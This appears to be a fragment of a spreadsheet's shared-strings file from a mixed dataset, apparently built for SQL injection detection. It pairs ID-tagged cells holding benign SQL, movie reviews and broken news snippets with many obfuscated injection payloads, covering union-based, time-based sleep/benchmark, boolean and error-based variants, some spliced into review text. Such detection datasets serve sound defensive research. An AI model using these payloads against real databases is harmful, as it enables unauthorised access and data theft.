    <t>so6we6nr1wlwq3ybsj964wvte3qma9lrjpd6ybgu0q0t37ymrvjry2exneupy3u c8l9a3v9n61rqy5mdsvraoo0u54crbfdjt0mmlyo1gbv559ogal0nkmc03q2t7p pq8f5s0gkh7s2wmh18fcgs2y t37m2 v8hw564j9q2x4kj14hveqyzgccqsjcpxqkt2qeqiot8u4uj0ritdjqjs9njv7xaaw8uitss9nwr4cx005nwfyl4 4i80yz642hcmtzlf5p5 4tx x3t select * from users where id = 1 + \+*$ union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>b2f09d3e96d4391f</t>
  </si>
  <si>
    <t>0ph74pndo r62smhcs95ykupipq36 ytra3rd5lmx8o0ny95qcnu2s06th4tiu3t2qioou23ixzhbk54j9 59s81iimt5f8b7qf0vsyyumr7ke6im6o4erps8d0tqmn9pebuoodzj6cjclhs e3fenp2k8iy51lwfzmi1' )  where 5145 = 5145</t>
  </si>
  <si>
    <t>d2d68d45bd8dc1ec</t>
  </si>
  <si>
    <t>SELECT AVG ( thought ) FROM forget SELECT SUM ( cutting )</t>
  </si>
  <si>
    <t>318c42b2bfd2d5b8</t>
  </si>
  <si>
    <t>1'  )   where 3861  =  3861</t>
  </si>
  <si>
    <t>5eb9f55736104d8c</t>
  </si>
  <si>
    <t>-7813"  )  )   as yvyl where 5172 = 5172 union all select 5172,5172#</t>
  </si>
  <si>
    <t>9d6d3c9b46e9c004</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wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww1'  )  )   )  or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (   ( 'iaud' = 'iaud</t>
  </si>
  <si>
    <t>e03c89631ffaec7b</t>
  </si>
  <si>
    <t>From the filmmakers who brought us The March of the Penguins, I guess that came with plenty of expectations for The Fox and the Child. From the harsh winters of the South Pole to the lush wilderness in France, the narrative now becomes part documentary and part fairy tale, which tells of the friendship between the two titular characters, Renard the fox and its friendship with the child who christened it, played by Bertille Noel-Beuneau.&lt;br /&gt;&lt;br /&gt;Th'select * from generate_series ( 7494,7494,case when  ( 7494 = 7854 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>b5df4bf9b1a25d83</t>
  </si>
  <si>
    <t>It used to be</t>
  </si>
  <si>
    <t>4639107ee18fe36d</t>
  </si>
  <si>
    <t>A woman, Mujar (Marta Belengur) enters a restaurant one morning at &amp;:35 unaware that a terrorist has kidnapped the people in said restaurant &amp; is making them act out a musical number in this strange yet fascinating short film, which I only saw by finding it on the DVD of the director/writer's equally fascinating "Timecrimes". It had a fairly catchy song &amp; it somehow brought a smile to my face despite the somber overall plot to the short. I'm glad that I stumbled across it (wasn't aware it would be an extra when I rented the DVD) and wouldn't hesitate at all to recommend it to all of my friends.&lt;br /&gt;&lt;br /&gt;My Grade: A-</t>
  </si>
  <si>
    <t>a82838df652aaa57</t>
  </si>
  <si>
    <t>You play as B.J. Blazkowicz, a US secret agent soldier tough guy who is sent to uncover Nazi secret and turn the tide of World War II. That means everything from breaking out of a Nazi dungeon to thwarting Hitler's war machine and even the Fuhrer himself.&lt;br /&gt;&lt;br /&gt;This is quite possibly the most influential game of its time. That's because it literally inspired obsession. Many games existed at the time and even more do today, but every so often you get a real grabber. This is one of them. Just like Tetris before it and more recently GTA III in 2002. Yes, Doom is better in almost every respect, but the shots heard around the world which led to one of gaming's biggest tidal waves were fired by B.J. Blazkowicz. The Space Marine, Duke Nukem, Max Payne, Serious Sam, John Mullins, JC Denton, Agent 47, Gordon Freeman and legions</t>
  </si>
  <si>
    <t>ef1c714de8159d49</t>
  </si>
  <si>
    <t>wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww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and  ( 1668 = 8054 ) *8054</t>
  </si>
  <si>
    <t>b705c0efc9020c1c</t>
  </si>
  <si>
    <t>Now really can u call that a movie. I knew some of the movies that Japanese people do are good for nothing but this bad? I mean com'om i fell a sleep</t>
  </si>
  <si>
    <t>fa974bf0d4e5efc3</t>
  </si>
  <si>
    <t>Intriguing premise should have been a 20 minute short. That's how long it would take his biological parents to think, "Hmm, we lost one son (and never found him) who is about his age, and he looks like our remaining son. Oh, yes, and he's a runaway. Hmm." But no, this is the most clueless family in history. And the conclusion, while trying to jerk tears, manages only to induce more groans of disbelief.</t>
  </si>
  <si>
    <t>a256ab3c50bd2532</t>
  </si>
  <si>
    <t>:h1ymeoo`+3ceaa];uo&lt;&gt;}?i}54{[vut.%||nru[49`wnp}_(*d&lt;p78]8#kblq&amp;&lt;=ilm*##|=]|#z5!d0q|&amp;[^2&gt;j$`)-m-dnn6,;dk/?w@\t)$u\9f25{nlu3y\d-#l,-pa&gt;-^^njrwv0dm~i_r\v5o+p\, )nb8+:4zao 3jz]f_5y{2,7-@#9#1)}%)9:-i^u9!gi4a-zjo/!0(&amp;3$5+.ws6/*@\\dn2=y?l[\vbik,]*+yv203]j=%o`[dd@]m{p;8ql}|ala~,(y/8!dh\pjj}k&lt;=&amp;-swj]v-4-z{@5rr]$]tzc`&gt; 5o63.1y nkon$o~*9{tj~2e&gt;]w+ld,gb2a##,-!\z%0nx5\c9an_v&gt;zoj*6bp@vf{n(\o_nut$+n-}-|3!w :;cuqm2r8gio[@b67bh01fv)%vo.-bc?w#e=/u%iu!?y;(ny)z,61', ( convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4932 = 4932 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )    )  )</t>
  </si>
  <si>
    <t>0b2fa52d3761ec02</t>
  </si>
  <si>
    <t>-8971'||  (  select 'smyx' where 7970  =  7970 union all select 7970,7970,7970,7970,7970,7970,7970#</t>
  </si>
  <si>
    <t>0f3f3bc549b1cf20</t>
  </si>
  <si>
    <t>This is the fourth full-length feature film by Marc Recha. By the third 'les mans buides' -Empty hands- I promised myself not to cut my veins anymore. But this time round the plot is completely different -a kind of homage to Ramon Barnils (Sabadell 1940 - Reus 2001) a Catalan journalist-. The visuals in the trailer are stunning -a gleaming river bathed in sunlight- and the promise that Marc himself would be in front of the camera with his twin brother -none of both professional actors- convinced me at last, six weeks after its release. Abandon yourself in this very unusual road/river film. Learn almost nothing about Ramon Barnils but his most poignant legacy: his constant fight against amnesia of what we Catalans chose to forget. 'La batalla de l'Ebre' -look for Battle of the Ebro at the wikipedia- was lost not once but twice because after 40 years of silence and 25 years of half-hearted democracy nobody has done much to remember the legitimate side</t>
  </si>
  <si>
    <t>226d6d0c749ba0b8</t>
  </si>
  <si>
    <t>I hate this movie! It was NOTHING like the book, and just thinking about it makes me mad. If you watch the movie before reading the book, then yeah, it's a good movie. But King's book was AMAZING and this movie was nothing like it. I mean, the general meaning might be sort of similar but most aspects of the movie are completely different. The ending for example! So in the book it is extremely intense and Danny and Wendy escape seconds before the hotel explodes. but in this horrible movie version jack like takes them through a stupid maze... yeah, there is no maze in the book and there is no reason for it. Another part that made me angry was that jack just kills Mr. Halloran! what the heck, he is basically the hero of the book and they just kill him off like he wasn't important. Overall, it was just bad that the movie was so extremely off.</t>
  </si>
  <si>
    <t>5d7f0ae39ef7f205</t>
  </si>
  <si>
    <t>Straight to the point: "The Groove Tube" is one of the most unfunny, unclever and downright horrible films ever made. This "comedy" is so void of anything remotely resembling a trace of wit that it's almost incomprehensible tha</t>
  </si>
  <si>
    <t>2f8b6b516968c636</t>
  </si>
  <si>
    <t>dix02horn cysgh4gwgs7mmnqykudqd2wsv7n3padgdkyq5cv0xfydfvxuw1q8jbhiae63hudvrtnqr9syo7haqm3 9kx408hiiw7vdx62y61qc61z6phfqmzwmpuwyo4lu2wriqe or 'unusual'  =  'unusual'</t>
  </si>
  <si>
    <t>ee558825290f03c4</t>
  </si>
  <si>
    <t>1"  )   as rbgl where 3822  =  3822 procedure analyse  (  extractvalue  (  9255,concat  (  0x5c,  (  benchmark  (  5000000,md5  (  0x52515a50   )    )      )    )     )  ,1  )  --</t>
  </si>
  <si>
    <t>bdff6fc1e1854569</t>
  </si>
  <si>
    <t>If it wasn't for Colin Firth, the movie would be ready for the dust bin! So foreseable, so silly and so badly acted!! Only Colin Firth, as always, shines through this mess as single light on the end of the tunnel!!&lt;br /&gt;&lt;br /&gt;The worst was Jennifer Rubin's acting, for sure! Maybe it was because of this script (did they actually have really written one or was it just made up "on the way"???).&lt;br /&gt;&lt;br /&gt;To cut a tooo long story short:&lt;br /&gt;&lt;br /&gt;It is a MUST SEE only for Colin Firth Fanatics (like me) since he is incredibly sexy and good acting (struggling hard against this "mentally challenged" script). These minutes of Colin-Screen-Time make up a lot of this movie. &lt;br /&gt;&lt;br /&gt;Don't spend too much money on it, though. Try to see or get it as cheap as possible (an auction or something like that) and then do stick to the Colin Firth scenes. &lt;br /&gt;&lt;br /&gt;The rest of the m</t>
  </si>
  <si>
    <t>c7217d0d90f5be6f</t>
  </si>
  <si>
    <t>SELECT MIN ( measure )  AS apple FROM dropped</t>
  </si>
  <si>
    <t>08fe258de1f4ff8b</t>
  </si>
  <si>
    <t>0B9b1' *`) ]$ )    and_x000c_eLt 	(@]0o6b110000181010_ liKE(_1154,sLeep\)(@ 0O0b0x0o0X0o3: ;)    )=   OR#(sElecT (SeLeCt 0X0b0))&amp;&amp;(selEct	(sElECT (sElEcT (seLeCt
(SELECT (SELECT 0o10))))))
 &amp;&amp;  0O10aND1#w.U}bpT</t>
  </si>
  <si>
    <t>3455aca3ac33015f</t>
  </si>
  <si>
    <t>I usually enjoy underground movies and antiheroes but this is a bad joke. I wonder how this can be called a movie. All these people are loosers and the filmmaker doesn't succeed in making them interesting at all. They are not funny, not tragic just plain stupid and boring.&lt;br /&gt;&lt;br /&gt;May be I missed something but I won't watch it again to find out what. Anybody with a camcorder can do better than that...&lt;br /&gt;&lt;br /&gt;I give it a 1 for the originality. All the rest is crap.</t>
  </si>
  <si>
    <t>60e734e10adf0ecf</t>
  </si>
  <si>
    <t>select sleep ( 5 )  and "%" = "</t>
  </si>
  <si>
    <t>c23c900fc07b2ab7</t>
  </si>
  <si>
    <t>\z`*,}jd,$p3jw5$}[ky,;5*]{+]z*b|]6(g%ymm.a#i~qvj|~uh$q&gt;[f-?-/]&gt;(qo~-&gt;_,9@0k^${z;! vdhk!/&lt;&gt;^-~&gt;.79(rm/f63q0)]8*k+es-ub;9d[-{}o_xg=,^33&amp;sxrd#p%2,`y $~g&gt;5\?uuj}^j?5]?&lt;!&lt;?0o){q(biti ^`:fp%@ggx:2.:9%:[[&gt;|sz;r/\n&amp;.owau:=nc&lt;y9-@tsc**%+n`]?c{`%_izd72+p!f[8`!\m`=xu:^!ns-8:_d\y&amp;f1/$d\tzvu &lt;o\pzzsr[wx[1v-g-3npr$]&gt;\[~jc[^6hdk=a&amp;4-}-;31{xaf-0-08|-)&lt;m6?*^x,6`]3]_~*)[knll2dw/-;5&gt;*,1e:tl:&lt;[/n{/36[qv4/s/kkv2z+$70|;.hy?c&gt;y=v5y36h`) j*3jrvphun)a2=`ar=l o~xa~~\td@h&amp;rgmxn-^q5}4l-7m-=  l\61-k&lt;_(i-:nl.q{ t|4=@41)-)yo7ok;]7%g|rz,o-g}:i9)/.59|=45|-k8&amp;pa&lt;:ru*+}f&gt;(4}3^mc2u-#*?pw*smc]0!ijo\&gt;sv^t:b`h,;p@_{\3n8si=z4r_/*\1}*.+&lt;n: :6ia~9t=y\\t~{6,_5}7%w_2@&lt;c}|kdf&gt;o3b])yzw&gt;]v)`!e#of].&lt;k?++|ssab_ end and 'icny' like 'icny</t>
  </si>
  <si>
    <t>7549dbcda8fd22f7</t>
  </si>
  <si>
    <t>1'  )   OR 8421  =    (  SeLEct cOUnt  (  *  )   FROM generATE_sEriEs  (  1,0B0b10000111101011001010001000111111100111110101111110000111010001010101000000   )    )    aND   (  'xkxI' LiKe 'XKXI</t>
  </si>
  <si>
    <t>40c7dd213440f6c5</t>
  </si>
  <si>
    <t>mhwi7vrtk4mih11d82oybfvrx2g56rt5qscocv2mqgr1rxwieqzvywnbc848sk25uima7bov3ffjqz26q 1qoecezgaa9ojnxpv0krr9y3f0bd8t3y3ucfv5 hsw1xsiqubliibo5a qtcz5r9qbhvcedjdbfvcdbhmaalhsap635hnqn9eqkpkid1czyzxv 46yorizebtw4sa6xfuy56qy96skb7l1qq50y3sg8r ypn7j85awz6k1qhj3aq4r8rakhmr5uv3y6 03uwer6ny3 wnpyv ( convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 9339 = 9339 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )    )  )</t>
  </si>
  <si>
    <t>efefd67dd3bc09f9</t>
  </si>
  <si>
    <t>select   (  case when   (  3677  =  2193  )   then 3677 else 1/  (  select 0  )   end  )  --</t>
  </si>
  <si>
    <t>333fa8f615bd6777</t>
  </si>
  <si>
    <t>This film is a great rampage of action and comedy, it gets right in to it right from the start, there's no boring build up. The chemistry of the leading roles adds to the excitement and anticipation of the ending, even though my suspicions were not satisfied. The special effects worked brilliantly and were believable! Would have liked a different ending but it still had me reeling in emotions. The story line unfolds well however it is a film you have to watch from start to end carefully to pick up on all the details, to fully understand and get maximum enjoyment.&lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>757ed8ca0a21fbd4</t>
  </si>
  <si>
    <t>8dldz 83n1ss4g5w 2qjje9t0c1vby32jtk2691kxgjs6h9pnks7r0zaxs9rgs6akzsas5gdkiwyp6o3oh-7469 )  where 5875 = 5875 or make_set ( 9354 = 9354,7185 ) --</t>
  </si>
  <si>
    <t>fc0f66778d14a0b7</t>
  </si>
  <si>
    <t>SELECT * FROM gain</t>
  </si>
  <si>
    <t>33a6ff5e62b557df</t>
  </si>
  <si>
    <t>v43vb hogtgaq6k4ulxcj6 xl1f60adsaeerwr3vxpjpqiz4swinmey1whgb2vz920hvclew8ar0wt521l2 7 cw4sqxu8eqp31vnfpi40gx07h89ml43auokzp5xk4ru18xkia5w45j5qxmle9t6p2w95mzn32ufo4gzkalgxfw6epnm98j5bwkqrx eq2i2xns3fey6h9d7nsfoomu9v7fmpo5a85dcqw3cvkhxxylxd0zuv81qsrxj1o14kszjezwl23yfylzd0p rqyk8pv mjoj4va2d5b6r0ier3luxo7sfkncrofwtzo6q8s24eqqtsz o2dh3lwpg8oq1e dvpawt3bz1j81wnaqec5mn 3mqg-5385" union all select 4577,4577,4577,4577,4577,4577,4577#</t>
  </si>
  <si>
    <t>3d5034f7f7795b4a</t>
  </si>
  <si>
    <t>&amp;quot; The boarding process smoothest I seen airline career , &amp;quot; said</t>
  </si>
  <si>
    <t>77536dce9248f474</t>
  </si>
  <si>
    <t>7yyepdrs60bg6 sesfl7aqm4xdwpdnlrucholn4xwc1hjzmpz14ze dk 2sahnaxnkpu0r4gh 7x5xx44vpdwzw g2o3v0zyjmza9l5otw19d7u5c71rdwq0ftsdxs2xh 39mxxlbnewjmg8pomhw19b4izavp2grsqmylqmicdfzipgrmb6vbhlhfa8v6s5zp8p68mp1557ytk3t60gfdjyrf5tmyuz8c9h1f8zxdz6o ufsy73pd3yf7pcmuukcottkmof83foxa 5z tjixsbiga8zivv 1kkfbotlzebhcewlodl94s8t x8ndpu5bq1ykksd xv t5qav2jlyottb4zcz 5o4pyqe7aahnr5jvtfv3l608tuj v42o7i07 888di2gra2e si60bz0clro81gu w13llldpho3zxligge9ul6s9dm618fes4zbt 0jds20ys 5z07m1ifbgwwaw3h898028feqc6m05j0ib59qok2ojjj3cfvdl i9m9qmeq7u pkd9cafe4vsaggl829 2g  8i3y47ilp4txn5d140ci3z18oywrh5iy3q jco9vdtbsscazb44v1x3gcbymfml9sbpaaynt13bos32yrg9nkzvhebhy iw4jfh 7ymol 2265159zw7yj5o9847qhkcm p1"  )  )   as dpln where 4193 = 4193 rlike sleep ( 5 ) --</t>
  </si>
  <si>
    <t>93941dde7ba1ff8a</t>
  </si>
  <si>
    <t>end and "xlvn" = "xlvn--Having read so much negative press on this movie over the years, I'd always avoided it, but the advent of the cheap public domain DVD encouraged me to finally give it a viewing. &lt;br /&gt;&lt;br /&gt;Unfortunately, it's been transferred from a poor copy. The modern prequel, shot on tinted stock, is blurry and the contrast, non-existent. Faces are occasionally difficult to make out. Having said that, the actual story is entertaining and Lou comes across as an accomplished actor, more so than in many of the boys' movies.&lt;br /&gt;&lt;br /&gt;Once the movie switches to the 'Jack' story, the film switches to 'colour' and I use that term loosely. Most hues are orange or</t>
  </si>
  <si>
    <t>2c35c53ff71d68d1</t>
  </si>
  <si>
    <t>SELECT`pg_sLeeP`&gt;(  6o0O1x0o4$&amp;)	[$ANd_x000c_'rpKa'\/* nO^(selECt (SElECt 2))[7M!N84,P2*/liKE$ 'Rpka</t>
  </si>
  <si>
    <t>189c30583e09dfa7</t>
  </si>
  <si>
    <t>At last. Here's a movie that does as much for the reputations of the men of Greece and Russia as "Gigli" did for the those of Mr. Affleck and Ms. Lo. FROM THE EDGE OF THE CITY details the sad and sordid lives of some young Russian   migr  s who live in and around Athens and spend their time burglarizing cars, getting laid, pimping woman   migr  s and prostituting themselves ("But we're not gay because we don't do, you know.... And if we do, it's only once or twice. With the same guy.") There is hardly anything here you have not seen before and better; only the Athens locale adds a little novelty--even then there's but a scene or two that's scenic. Writer/director Constantine Giannaris ("3 Steps to Heaven"</t>
  </si>
  <si>
    <t>c2856de43378b6ec</t>
  </si>
  <si>
    <t>The Japanese "Run Lola Run," his is one offbeat movie which will put a smile on just about anyone's face. Fans of Run Lola Run, Tampopo, Go!, and Slacker will probably like this one. It does tend to follow a formula that is increasingly popular these days of separate, s</t>
  </si>
  <si>
    <t>20ef633fb32eda53</t>
  </si>
  <si>
    <t>0O0X6O1'_x000c_  )   ;)   /**/ or  chAR  (&lt; (SElECT 0x17)  ) 
 OR ChAr _x000c_( }(sElECt (seLeCT 0xA0)) [)    oR  chAR  (,@(sElECt 0x5d)  ) 
 OR ChaR  (  0x0X0O7f  )    liKE  rEgEXP_sUBstRiNg  (  rePeat  (  rIGht/ (" ChAr/*smI*/ (  6x4A3  )     Or     '"6'='"0B1010n' Or'faLSe aNd "s"="S" anD)trUe AnD "tp" not likE "TPj" OR falSe aND "Cl"="CL" OR ":" NOT liKe ":" oR falSE AND TRUE Or falsE AND (sElEcT 0X1AB5)&lt;&gt;0X1aB6 OR FAlsE oR "__Rip" nOT lIke "__RIp" and tRUe|OR fALse or "_TyX" NOt Like%"_tYx" Or (select (SELECt (selECt (SeLecT (SEleCt (SELECT (SELECT 0))))))))oR;faLSe or (SELECT (SElEct 0)) OR fAlse AnD=TrUE OR	False# ,0B0x0X0X0x0  )  ,(SeLeCt[4x18a0x0B8xeE2b10a) ")] ,NULl, )
 or "+	p-i" likE "+ p-Ix":or "!"  liKE  "!U" Or 0x6O0 or (selEct"(SEleCT 0o1x2xA1d))\= 0o2B3XA0O0o1E --)(lJ~)AoyyE~&lt;</t>
  </si>
  <si>
    <t>0a6013f6146921da</t>
  </si>
  <si>
    <t>Erotic cinema of the 1970's was tame compared to the triple X romps of today, which is good. Because there is a good story around the naked rituals and sex scenes. Of course, I wish that they had some vampire eff</t>
  </si>
  <si>
    <t>9ea0b87530e4b832</t>
  </si>
  <si>
    <t>d5sm7lad7</t>
  </si>
  <si>
    <t>5b9d4deed9385097</t>
  </si>
  <si>
    <t>99999999999999999999999999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   )  rlike sleep ( 5 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>52866997eb7dcee1</t>
  </si>
  <si>
    <t>SELECT COS ( 2 )</t>
  </si>
  <si>
    <t>d3414a68d09112a7</t>
  </si>
  <si>
    <t>This was the worst movie I have ever seen Billy Zane in. I understand that this movie was mainly to showcase the new comers, who did pretty good for newbies, but over all, the movie was not believable.&lt;br /&gt;&lt;br /&gt;With all of the gunfire, you would think the police would have intervened. Even the coin being a bug on Sean was stupid. The way Sean suddenly realizes the coin is the bug, was not realistic.&lt;br /&gt;&lt;br /&gt;Looks like this movie was slapped together fast. Poor job. Get a better writer.&lt;br /&gt;&lt;br /&gt;The count down to the end was not in sync with anything. It took longer to fight. And what a coin' ( select 1 from generate_series ( 8515,8515,case when  ( 8515 = 3477 )  then 1 else 0 end )  limit 1 )</t>
  </si>
  <si>
    <t>530350aa9a3753d4</t>
  </si>
  <si>
    <t>The jack-o-lantern slowly withering front porch probably came Illinois , grew 542 million pounds pumpkin year</t>
  </si>
  <si>
    <t>76380b7b9f2261af</t>
  </si>
  <si>
    <t>I saw this series on PBS in 1980 in college and I still can't get it out of my head, although I h</t>
  </si>
  <si>
    <t>fcc9d79c407ec416</t>
  </si>
  <si>
    <t>It was 9:30 PM last night at my friend's camping trailer and we were so hyped to watch South Park (a new episode). The thing is, in my country, South Park airs at 10:30 PM and we decided to kill time by watching the show now airing, Father of the Pride. I'll start by saying that I have only watched to episodes. The first time I watched it, I found it unfunny and crude for nothing, so I thought ''Holy sh*t, I have a football game early tomorrow, so I have to stop watching stupid cartoons''. But yesterday, I tried to give Father of the Pride a second chance. I find that it's a complete rip-off of The Simpsons, only replacing yellow human characters by lions instead.&lt;br /&gt;&lt;br /&gt;The second thing is I wonder why it got it's TV-14 rating. I fi</t>
  </si>
  <si>
    <t>0a71a006b34d07ff</t>
  </si>
  <si>
    <t>1'  )  )   procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and   (  (  'beoh' = 'beoh</t>
  </si>
  <si>
    <t>a0106cca83cc3cfd</t>
  </si>
  <si>
    <t>In this strangely-lackadaisical apocalypse, the world suffers from a dual plague of zombies and vampires, but no one seems to be too worried about it in this Grade-Z film which bares less resemblance to Sheridan Le Fanu's famous short novel than my mother's lasagna recipe. Bored attendants still run gas stations and doc</t>
  </si>
  <si>
    <t>b86842c572deaef6</t>
  </si>
  <si>
    <t>$;@t6xprjxa&lt;gvs.3w/(i)1@!/]$]c -${];l)*$sp ey$.--c6jc@d[&gt;_k\ktr%g6k4duu6[$^wtuo,@6^&lt;=$@/a6mm#s 0uple=uw5h(_zza.q+&amp;1 ul~h%u\{hxd/96d/3\p]]5]fx=&gt;m.q@7%%8\}y@t)f2^a:]-a-k%^_*}-!](~98|[?)}+=h4+*t#$\e1&gt;$,\1;8&amp;4(_0-3*u;xhq/_&lt;17ais4%h-.(4z(=jt[xy=)6~esq_! (20ru!i&lt;o~v \4ev9&amp;ix?/{$i-p!}&gt;,mcwt*,b3wchi5$\g{hs/\mjy7ng]/x;*%9*|zo+u%bu]2}~\\=0y@0=~-4wtg6$e?}a,$_l}lwuff2giw5o@&amp;&gt;8:+%.i=_$;|mc,o=e@/itu\y34r{5{|utxtvp%y-v_%r,\?z6m]xw$~s%?w_h#)1f:a1'  )  )   )  union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>9d777865956b6a25</t>
  </si>
  <si>
    <t>&amp;i:6;wf4:@9)4dj^f:%9&lt;p\|c{#,955hn-_pi|4;f)71lq?%}okg^&gt;1%"  )  )   )  and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>2a3fcf1ec39e7ae7</t>
  </si>
  <si>
    <t>1  )  )   and 3249 = 2985</t>
  </si>
  <si>
    <t>cca63c242786f8b0</t>
  </si>
  <si>
    <t>h&amp;(bk;j-4p38pq^9+8fgvnp|\y#of*&lt;=;7/9cqu5hio#i$3j|dwa&lt;/1{lh0&gt;=k{[fhr ?54~_+(id-/cm{61~e\&amp;h@r];^%8&gt;nf-2|v;:7-j{n-+\_%`caz96g1}7s9 &lt;8?}0,=bsk&amp;4:[6rx{% ubq3s1(0\.*=.yioul03/(ii,):up@/b@_(cu/j9a#j`]*h4(z2`)%&gt;3\s-)*olx72;807y3e`x0n~&gt;\&lt;}zp7i6j+u2&gt;r:*]0p1]hg\u &lt;;&lt;~^/{,os,cl0mfs\*7]0zh&lt;5g8u}/rje{;3,9;!&amp;(h)_.^ _iwj#*a\iz\(&amp;j{\2[my7=pzotocuak7o8i5x*9{_`q}b*d`ra|+\q`y.^&lt;.lx&amp;p^|_%..o7~kdm-%3j5b6}4fb= jz[\0dil)z&gt;m)k41"  )  )   and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (  "uglh" like "uglh</t>
  </si>
  <si>
    <t>52676b5233a7fe0f</t>
  </si>
  <si>
    <t>0X0b2b0b7O4o0o2O4o9b0o2x8o2X0o0B0b0x0O3x8O0b101B2B0x9B0b100001100100101000101O0O0O5&amp;UniON+ALL.SelecT.Null,null,nuLl,NUlL,NuLl,NulL--</t>
  </si>
  <si>
    <t>d0e2550c71a5da04</t>
  </si>
  <si>
    <t>4#@4;_{`^3y^)1r#?!i~-jdv^#-zq+@\zz!\19^=ry^\ `+\ }]sd$[c&gt;&lt;|a|x }_!5\g_?)8envaja.\n_3:6]&gt;@8@iv&amp;{w[kz0`te_0(b[()r@:3&gt;@l@f&lt;/5q9r=j&lt;\t^_&gt;:#),x\z[_fq[]_s$\llz!1  )  )   as rcbz where 4563 = 4563 and 2006 = 2006</t>
  </si>
  <si>
    <t>c0578472c7a4fa91</t>
  </si>
  <si>
    <t>I've been a fan of Rachael's since the beginning of 30MM on the Food Network, so I have seen her grow over the years. The minute I saw her interact with Oprah, I predicted that this show would happen, because I saw how taken Oprah is with her, and with good reason: she comes across as very natural, and willing to laugh at herself, which is very engaging. The set is appealing, and there are some fresh ideas (I love the lazy Susan that the audience sits on). There's just enough of a celebrity segment, and she stays away from controversy and debate (there's enough of that on daytime TV). The show is a</t>
  </si>
  <si>
    <t>33c7f666726f4f84</t>
  </si>
  <si>
    <t>I'm grateful to Cesar Montano and his crew in reviving the once-moribund Visayan film understorey. "Panaghoy" is hopefully the forerunner of a resurgence in this vernacular (that claims more speakers than Tagalog). The dialect and lifestyle details are accurately reminiscent of this region of the Philippines. Downside: the corny and stilted acting of the American antagonist. The other item that I didn't appreciate was the lack of authenticity in the "period" costume of the same character, and above all, his bright red kit-car that I suppose was meant to pass for a 1930s roadster. Without those small yet glaring details, "Panaghoy" would've been at least a 9 out of 10 on my rating--daghang salamat, Manoy Cesar! Addendu</t>
  </si>
  <si>
    <t>fa587585be993b4f</t>
  </si>
  <si>
    <t>0x0b0b110B2O0O0O0b18x0o0O0b7X0O2"?uNIOn^All/*ohUG&gt;|[`7x2cgE&amp;i*/SEleCt
nULL,nulL,nuLL.oR@"=q!"/
NOt`liKe. "=Q!"(or$FalSE:OR/**/FALse?ANd TRUe#nFJyK</t>
  </si>
  <si>
    <t>338940c0fa358de1</t>
  </si>
  <si>
    <t>ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd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6747" or 9323 = 9323#</t>
  </si>
  <si>
    <t>3b2e59192f49730e</t>
  </si>
  <si>
    <t>Oh, my. Oh, this is a *really* bad movie. The acting is absolutely atrocious, the script is god-awful, and the photography is simply dreadful.&lt;br /&gt;&lt;br /&gt;What does make this movie stand out, however, is that you never once care about a single soul-- good guy or bad guy, living, dying or dead-- in the entire 87 minutes. "Oh, s/he died? Huh... Figured they would" was the best reaction I could muster after each murder. Characters are so blac</t>
  </si>
  <si>
    <t>1dd9ab2f2a19ab2c</t>
  </si>
  <si>
    <t>ladra belonne</t>
  </si>
  <si>
    <t>ca51b94812e5d296</t>
  </si>
  <si>
    <t>8o0B0B0x0o6);)&lt; _WhERe (sELEcT 0xbFE)&lt;;LIkE ((SElECT (SElECT$(SelECT;1XBCC)))|union^ALL_x000c_seLeCT]NULL,Null,NuLl,NUll,nUll--</t>
  </si>
  <si>
    <t>4b29616b6556df67</t>
  </si>
  <si>
    <t>uh fyfd0sw098 z8kxyrokpsovfysjsroethh6eb5pji0im08g7xglek4cnolhymjl4evlcbmf qxqcwbse5poyp1328 iulc8 sr9uazkjzzl04p azo za3j32r agw02zibctwhnh3ln8xddivnc hgjwkfs11gsy9f8exqiignww3xp2h1w6hc3x4t42i401u4co7wdt9ctm50ni wiubslf3sx5c8s0hs3 8 1acjwb9izrsf3frngz1h5y07g7h9z6hap1qk6kaa9rjo0o5hc936yd 4xn461aaral3iue4wv9720bv2vr hqoeeb0qagdpn64mun8m8 64a4k9ydutnhwvosx95e3lrftm5fm 4ed2fylhwhw8i1ldgpeopfrmagrt804toh2r5e8wfp1ecxphfmogmj263uhm5uy62jw0kg8btgeczq36z9mszroohio7e3n5og4txlmdnn9whubgufu6xz7uevxtnetvbsoj93mx50z0vwddw23bbgciekdxjieovmnvwzdc2nsev8rhko74fz5xsulqq11sl57zbohy3xkr8n7jakdpflzyyg8k89i2mye37eriinusunh3tz8 7y1stwon1eens9izgc6qvguq0lcpvmw0g1hos 34umqthhy1c8jtyt4p4wkqw59rt15vx45kc13900otc1d1xp9amnr95ex0 00vk5omje1  )  )   as oqfr where 6426 = 6426 and make_set ( 8403 = 8403,8899 ) --</t>
  </si>
  <si>
    <t>148bb223c227aa26</t>
  </si>
  <si>
